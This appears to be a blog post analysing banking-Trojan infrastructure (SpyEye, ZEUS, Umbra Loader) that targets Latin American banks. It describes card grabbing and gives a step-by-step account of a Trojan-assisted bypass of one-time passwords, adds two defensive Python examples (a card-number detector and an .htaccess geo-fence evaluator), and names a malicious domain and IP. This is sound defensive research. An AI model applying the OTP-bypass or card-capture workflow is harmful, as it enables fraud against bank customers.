<a href="http://3.bp.blogspot.com/-NsGCKtY_9OU/UH8868LsJyI/AAAAAAAAAPA/EozzD1iNXYg/s1600/spyeye.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="283" src="http://3.bp.blogspot.com/-NsGCKtY_9OU/UH8868LsJyI/AAAAAAAAAPA/EozzD1iNXYg/s400/spyeye.JPG" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">At the time of analysis the panel controlled 1185 infected machines. These machines belong only to users located in Argentina, Bolivia, Chile and Mexico because, as seen in the previous article, the server hosting the whole criminal infrastructure is configured to reject connections from users outside those countries through the access control in its .htaccess file.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"> </span><span style="font-family: Arial; font-size: 11pt;"> </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-2MScBQeZR2Q/UH89JV-dgAI/AAAAAAAAAPI/8HQjwjlw9O4/s1600/stats.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="161" src="http://4.bp.blogspot.com/-2MScBQeZR2Q/UH89JV-dgAI/AAAAAAAAAPI/8HQjwjlw9O4/s400/stats.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">In the control panel options, different plugins can be configured, each with its specific functions for controlling the zombie machines and capturing confidential data from the victims.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"> </span><a href="http://2.bp.blogspot.com/-D_5tJNenrFs/UH89Q03J00I/AAAAAAAAAPQ/g0FWdZkS5Kw/s1600/plugins.jpg" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="400" src="http://2.bp.blogspot.com/-D_5tJNenrFs/UH89Q03J00I/AAAAAAAAAPQ/g0FWdZkS5Kw/s400/plugins.jpg" width="331" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">The other module that almost always accompanies the SpyEye panel is dedicated to managing the data captured by the Trojan on infected machines.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The control panel of this module looks like this:</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-UX1P0kvvPlc/UH89eDDWnjI/AAAAAAAAAPY/dctaadq60UA/s1600/grabber.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="281" src="http://4.bp.blogspot.com/-UX1P0kvvPlc/UH89eDDWnjI/AAAAAAAAAPY/dctaadq60UA/s400/grabber.JPG" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">This module offers a wide range of options for capturing all kinds of data and information from infected machines, such as FTP server credentials, client certificates, screenshots of the victim's machine and credit card details, as well as managing and searching for confidential information in the victims' log repositories:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"> </span><a href="http://3.bp.blogspot.com/-GN57k2b2JQw/UH8-cmn4U1I/AAAAAAAAAPo/njMypMV7aDk/s1600/search.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="216" src="http://3.bp.blogspot.com/-GN57k2b2JQw/UH8-cmn4U1I/AAAAAAAAAPo/njMypMV7aDk/s640/search.jpg" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">One of the plugins it has active is the CC Grabber, whose job is to search all the logs collected by the trojan for credit card numbers, together with the confidential data needed to operate with them, such as the CVV and the card's expiry date.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Every time a user infected with the SpyEye trojan makes a purchase at an online store, all the confidential credit card data entered at that store is captured by the trojan and sent to the fraudulent server where the Control Panel is installed. This is possible because the trojan can capture everything sent with the HTTP POST method before the user's browser encrypts it.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The plugin works as a small data-mining application capable of recognising the 16-digit credit card number and its associated data and storing them so that the criminals can later use them to commit fraud with the customer's card.</span></div>
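<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The pattern the CC Grabber relies on (a run of digits that passes the Luhn check) is the same one a defender uses to find card numbers in a leaked log dump or to build a DLP rule for outbound POST bodies. The Python below is an added example written for this post; it is not SpyEye code and does not come from the original article. The captured request body it scans is constructed from publicly known test card numbers, and the detector generalises the 16-digit case described above to PANs of 13 to 19 digits with optional spaces or dashes.</span></div>

```python
"""Find payment card numbers (PANs) in captured text, the way a DLP rule or a
breach-triage script would.  Added example, not SpyEye code."""
import re

# Candidate: 13-19 digits, optionally separated by single spaces or dashes,
# not glued to other digits on either side.
PAN_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")

# Constructed sample of a captured POST body.  The card numbers are the public
# Visa/Mastercard test numbers; the "order" value is a digit run that looks
# like a PAN but fails the Luhn check, so it must not be reported.
SAMPLE_CAPTURE = (
    "POST /checkout HTTP/1.1\r\n"
    "ccnum=4111111111111111&cvv=123&exp=12%2F14&"
    "alt=5500-0000-0000-0004&order=1234567890123456&zip=28001"
)


def luhn_ok(digits):
    """Luhn mod-10 check: every second digit from the right is doubled."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask(pan):
    """Keep the BIN (first 6) and the last 4, as a triage report would show."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_pans(text):
    """Return masked PANs found in text, in order of appearance."""
    found = []
    for m in PAN_CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            found.append(mask(digits))
    return found


if __name__ == "__main__":
    for hit in find_pans(SAMPLE_CAPTURE):
        print("possible card number:", hit)
```

<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Run against the constructed body, the detector reports only the two Luhn-valid numbers and ignores the order number, which is the false positive a naive "any 16 digits" rule would raise. Masking the output matters when the script is used on real captures: a triage report that lists full PANs is itself cardholder data.</span></div>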
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Here we can see how the details of a credit card were captured during an online purchase:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/--xydiMuUTHQ/UH8-ZmKxkhI/AAAAAAAAAPg/eJB-ou6XeAU/s1600/cards.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://4.bp.blogspot.com/--xydiMuUTHQ/UH8-ZmKxkhI/AAAAAAAAAPg/eJB-ou6XeAU/s400/cards.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">On the same fraudulent server infrastructure the malware propagation kit “<b>UMBRA LOADER</b>” has also been located.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-dDJCYNQgjho/UH8-sR2BlgI/AAAAAAAAAPw/lPEMxD54DvQ/s1600/umbra.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="http://3.bp.blogspot.com/-dDJCYNQgjho/UH8-sR2BlgI/AAAAAAAAAPw/lPEMxD54DvQ/s400/umbra.JPG" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">This infection kit has not yet started its malware propagation campaign and is practically inactive.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-NP_v1pJVxv0/UH8-x4S5UGI/AAAAAAAAAP4/C70i4TRepOE/s1600/umbra2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="http://3.bp.blogspot.com/-NP_v1pJVxv0/UH8-x4S5UGI/AAAAAAAAAP4/C70i4TRepOE/s400/umbra2.JPG" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
Jose Dos Santos, 2012-10-10: Detected attack to evade OTP authentication devices in Latin American Financial Institutions<br />
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">A criminal website infrastructure has been discovered that is set up to evade, for fraudulent purposes, the OTP (One Time Password) authentication mechanisms used by Latin American electronic banking institutions.</span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">This site is hosted on the malicious domain "<b><i>cybercartel.com.mx</i></b>", which is hosted at the IP 65.254.32.66 in the USA.</span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">The criminals have targeted their attack exclusively at customers of banks in Argentina, Bolivia, Chile and Mexico, in a very practical way: access to the fraudulent server is blocked from any IP address that is not in the IP ranges of ISPs operating in those countries.</span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">The criminals have modified the Apache server's .htaccess file to define a list of allowed IP ranges; any attempt to access from an IP outside those ranges returns a 403 Forbidden error, as seen in the screenshot:</span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-anXPTNdTg5I/UHMv3fqP32I/AAAAAAAAANI/W0JnON4S_dk/s1600/forbidden.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="347" src="http://4.bp.blogspot.com/-anXPTNdTg5I/UHMv3fqP32I/AAAAAAAAANI/W0JnON4S_dk/s640/forbidden.jpg" width="640" /></a></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0pt; text-align: center;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">With this method the criminals achieve several objectives. On one hand they obtain a high number of positive hits from infected users in the targeted countries and reduce server load by rejecting connections from users of no interest to them; on the other they deny access to most antivirus and computer security companies, and to police forces in other countries, that try to investigate the malicious content on the fraudulent server.</span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">The .htaccess file has the following format:</span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-oPAXf2P90aQ/UHMwK8N2HsI/AAAAAAAAANQ/syiO1dBQ76c/s1600/access.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="http://4.bp.blogspot.com/-oPAXf2P90aQ/UHMwK8N2HsI/AAAAAAAAANQ/syiO1dBQ76c/s400/access.jpg" width="400" /></a></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0pt; text-align: center;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">The remaining lines of allowed IP ranges have been removed because of their large number.</span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">In the following paragraphs we explain how the attack against the OTP authentication mechanisms of the affected electronic banking institutions is carried out.</span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">The process by which the criminals carry out the fraudulent transactions can be summarised in the following steps:</span></div>
<div class="MsoNormal" style="margin: 0cm 0cm 0pt 53.4pt; text-indent: -18pt;">
<br /></div>
<div class="MsoListParagraphCxSpFirst" style="margin: 0cm 0cm 0pt 35.4pt; text-indent: -18pt;">
1 - <span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">The user's computer is infected with a banking Trojan.</span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin: 0cm 0cm 0pt 35.4pt; text-indent: -18pt;">
2 - <span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">The Trojan begins capturing all credentials and passwords for the sites the user visits, using classic keylogging techniques.</span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin: 0cm 0cm 0pt 35.4pt; text-indent: -18pt;">
3 - <span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">When the user accesses their bank account over the Internet, the Trojan is activated and starts to take control of the user's browsing.</span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin: 0cm 0cm 0pt 35.4pt; text-indent: -18pt;">
4 - <span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">At that moment the Trojan sends an alert via Jabber messenger to a fraudster operating remotely, who will issue an illegitimate transfer order by accessing the user's bank account in parallel with the credentials captured earlier by the keylogger.</span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin: 0cm 0cm 0pt 35.4pt; text-indent: -18pt;">
5 - <span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">When the banking application asks the criminal for the OTP operation key, or any other password needed to validate the fraudulent transfer, the criminal sends a command to the infected user's computer asking the user to enter this OTP.</span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin: 0cm 0cm 0pt 35.4pt; text-indent: -18pt;">
6 - <span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">The Trojan processes this command by displaying a window in the user's browsing session requesting the real OTP key, which the user usually types in, believing it to be a normal verification step of their online bank.</span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin: 0cm 0cm 0pt 35.4pt; text-indent: -18pt;">
7 - <span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">The OTP code typed by the user is captured by the Trojan on the infected computer and sent back to the criminal via Jabber.</span></div>
<div class="MsoListParagraphCxSpLast" style="margin: 0cm 0cm 0pt 35.4pt; text-indent: -18pt;">
8 - <span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">The criminal enters this code in the session started earlier, validating the fraudulent transfer and completing the operation successfully.</span></div>
<div class="MsoNormal" style="margin: 0cm 0cm 0pt 17.4pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">Shown here for the first time is one of the control panels with which the criminals operate to carry out the attack that evades the OTP (One Time Password) validation systems:</span></div>
<div class="MsoNormal" style="margin: 0cm 0cm 0pt -54pt;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-YQ2t7asQKsE/UHMweEsLJxI/AAAAAAAAANY/7JLrSaxPR34/s1600/OTP.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="http://4.bp.blogspot.com/-YQ2t7asQKsE/UHMweEsLJxI/AAAAAAAAANY/7JLrSaxPR34/s640/OTP.JPG" width="640" /></a></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0pt; text-align: center;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">It can be seen how the operator connects remotely and receives the victim's sensitive data in real time; when starting the fraud process, the operator requests the necessary key data using the following menu of commands:</span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-HmWGWViWuCw/UHMwqehelRI/AAAAAAAAANg/osC0Fgk6uBE/s1600/token.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://3.bp.blogspot.com/-HmWGWViWuCw/UHMwqehelRI/AAAAAAAAANg/osC0Fgk6uBE/s400/token.jpg" width="281" /></a></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0pt; text-align: center;">
<br /></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0pt; text-align: center;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">The criminals can even send commands to block the legitimate user's electronic banking account, preventing access once the fraud has been carried out.</span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">On the same malicious server infrastructure a Control Panel of the old ZEUS banking Trojan has also been located, fully active and operational, collecting confidential data from infected victims.</span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-8_TJWsikT5g/UHMw4VRAt5I/AAAAAAAAANo/011qUZgk4SI/s1600/zeus.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="494" src="http://3.bp.blogspot.com/-8_TJWsikT5g/UHMw4VRAt5I/AAAAAAAAANo/011qUZgk4SI/s640/zeus.JPG" width="640" /></a></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0pt; text-align: center;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span style="color: #333333; font-family: Arial, sans-serif;">This ZEUS Trojan statistics panel shows the high hit rate of infected users from the countries targeted by the fraud.</span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">Below is a small sample of the confidential data captured by the Trojan's keylogger on the infected user machines.</span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ZpIS29dj68c/UHMw9qfQjfI/AAAAAAAAANw/gdkY14S-uRU/s1600/grabbed.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="452" src="http://2.bp.blogspot.com/-ZpIS29dj68c/UHMw9qfQjfI/AAAAAAAAANw/gdkY14S-uRU/s640/grabbed.JPG" width="640" /></a></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0pt; text-align: center;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
Jose Dos Santos, 2012-10-08: Attack against OTP devices in Latin American institutions<br />
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">The criminal infrastructure of a website has been discovered, set up to evade, for fraudulent purposes, the OTP (One Time Password) authentication mechanisms of the electronic banking of Latin American institutions.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">This site is hosted on the domain <b>cybercartel.com.mx</b>, which is hosted at the IP 65.254.32.66 in the USA.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">The criminals have directed their attack exclusively against the customers of banks in Argentina, Bolivia, Chile and Mexico, in a fairly practical way that consists of blocking access to the server from any IP address that does not belong to the IP ranges of the ISPs in those countries.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">To do this they have created a list of allowed ranges in the Apache server's .htaccess file. Any access from a non-allowed IP returns a 403 Forbidden error to the user, as seen in the screenshot:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-anXPTNdTg5I/UHMv3fqP32I/AAAAAAAAANI/W0JnON4S_dk/s1600/forbidden.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="349" src="http://4.bp.blogspot.com/-anXPTNdTg5I/UHMv3fqP32I/AAAAAAAAANI/W0JnON4S_dk/s640/forbidden.jpg" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: 11pt;">With this method the criminals achieve several objectives. On the one hand they obtain a high number of positive hits from infected users in these countries, while also reducing server load by rejecting connections from users of no interest to them and, above all, denying access to computer security and antivirus companies, as well as to police forces in other countries, that try to investigate what the server stores.</span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">The .htaccess file has the following format:</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-oPAXf2P90aQ/UHMwK8N2HsI/AAAAAAAAANQ/syiO1dBQ76c/s1600/access.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-oPAXf2P90aQ/UHMwK8N2HsI/AAAAAAAAANQ/syiO1dBQ76c/s1600/access.jpg" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">The remaining lines of allowed IP ranges have been removed because of their large number.</span></div>
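<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Both this post and its English version above describe the .htaccess allow list without reproducing it. When a suspected fraud host answers 403, an analyst wants to know whether the response is this kind of geo-fence rather than the content having been taken down, which means evaluating the rules the way Apache 2.2 does (Order, Allow from, Deny from). The Python below is an added example, not code from the article or from the fraud site; the rule set is constructed in the same shape as the screenshot, using RFC 5737 documentation prefixes instead of the real ISP ranges.</span></div>

```python
"""Evaluate Apache 2.2-style .htaccess Order/Allow/Deny rules for a client IP.

Added example (not from the original post).  Handles the address forms Apache
accepts for 'from': 'all', a CIDR network, a network/netmask pair and a partial
dotted address such as '192.0.2' (which matches the whole /24).  Hostname and
env= operands are not supported and raise ValueError.
"""
import ipaddress

# Constructed sample in the shape of the screenshot on the page, using RFC 5737
# documentation prefixes rather than any real ISP range.
SAMPLE_HTACCESS = """\
Order Deny,Allow
Deny from all
Allow from 203.0.113.0/24
Allow from 198.51.100.0/255.255.255.0
Allow from 192.0.2
"""


def _parse_host(spec):
    """Turn one 'Allow/Deny from' operand into an ip_network or the string 'all'."""
    spec = spec.strip()
    if spec.lower() == "all":
        return "all"
    if "/" in spec:
        # CIDR (a.b.c.d/24) or dotted netmask (a.b.c.d/255.255.255.0);
        # ipaddress accepts both forms.
        return ipaddress.ip_network(spec, strict=False)
    octets = spec.split(".")
    if all(o.isdigit() for o in octets) and 1 <= len(octets) <= 4:
        # Partial dotted address: each present octet fixes 8 bits of prefix.
        prefix = 8 * len(octets)
        padded = ".".join(octets + ["0"] * (4 - len(octets)))
        return ipaddress.ip_network(f"{padded}/{prefix}", strict=False)
    raise ValueError(f"unsupported host spec: {spec!r}")


def parse_rules(text):
    """Return (order, allow_list, deny_list) parsed from .htaccess text."""
    order = ("Deny", "Allow")          # Apache's default Order
    allow, deny = [], []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "order":
            first, second = parts[1].split(",")
            order = (first.capitalize(), second.capitalize())
        elif directive in ("allow", "deny") and len(parts) >= 3 and parts[1].lower() == "from":
            targets = allow if directive == "allow" else deny
            targets.extend(_parse_host(p) for p in parts[2:])
    return order, allow, deny


def _matches(rules, ip):
    return any(r == "all" or ip in r for r in rules)


def is_allowed(text, client_ip):
    """Apply Apache 2.2 'Order' semantics to decide whether client_ip gets through."""
    order, allow, deny = parse_rules(text)
    ip = ipaddress.ip_address(client_ip)
    allowed = _matches(allow, ip)
    denied = _matches(deny, ip)
    if order == ("Deny", "Allow"):
        # Default allow; a Deny match blocks unless an Allow match overrides it.
        return allowed or not denied
    # Order Allow,Deny: default deny; needs an Allow match and no Deny match.
    return allowed and not denied


if __name__ == "__main__":
    for probe in ("203.0.113.45", "192.0.2.9", "8.8.8.8"):
        print(probe, "->", "allowed" if is_allowed(SAMPLE_HTACCESS, probe) else "403")
```

<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">The practical consequence for an investigation is the one the post draws: a 403 from outside the listed ranges says nothing about whether the panel is still live, so the check has to be repeated from a vantage point inside an allowed range, and the allow list itself is evidence of which countries the campaign targets.</span></div>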
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">In this article we now explain how the attack against the OTP authentication mechanisms of the electronic banking of the affected financial institutions is carried out:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">The process by which the criminals carry out the fraud can be summarised in the following steps:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;">
<span style="font-family: Arial; font-size: 11pt;">1. The user's computer is infected with the banking Trojan.</span></div>
<div class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;">
<span style="font-family: Arial; font-size: 11pt;">2. The Trojan silently begins capturing, using classic keylogger techniques, all the credentials and passwords for the sites the user accesses.</span></div>
<div class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;">
<span style="font-family: Arial; font-size: 11pt;">3. When the user accesses their online banking through the browser, the Trojan activates and takes control of the user's browsing.</span></div>
<div class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;">
<span style="font-family: Arial; font-size: 11pt;">4. At that instant the Trojan sends a notice via Jabber messaging to a criminal operating remotely, who will create a fraudulent transfer order by accessing the user's bank account in parallel with the passwords previously captured by the keylogger.</span></div>
<div class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;">
<span style="font-family: Arial; font-size: 11pt;">5. When the banking application asks the criminal for the OTP keys, or any other key needed to validate the transfer, the criminal sends a command to the infected user's computer requesting that the user enter this OTP.</span></div>
<div class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;">
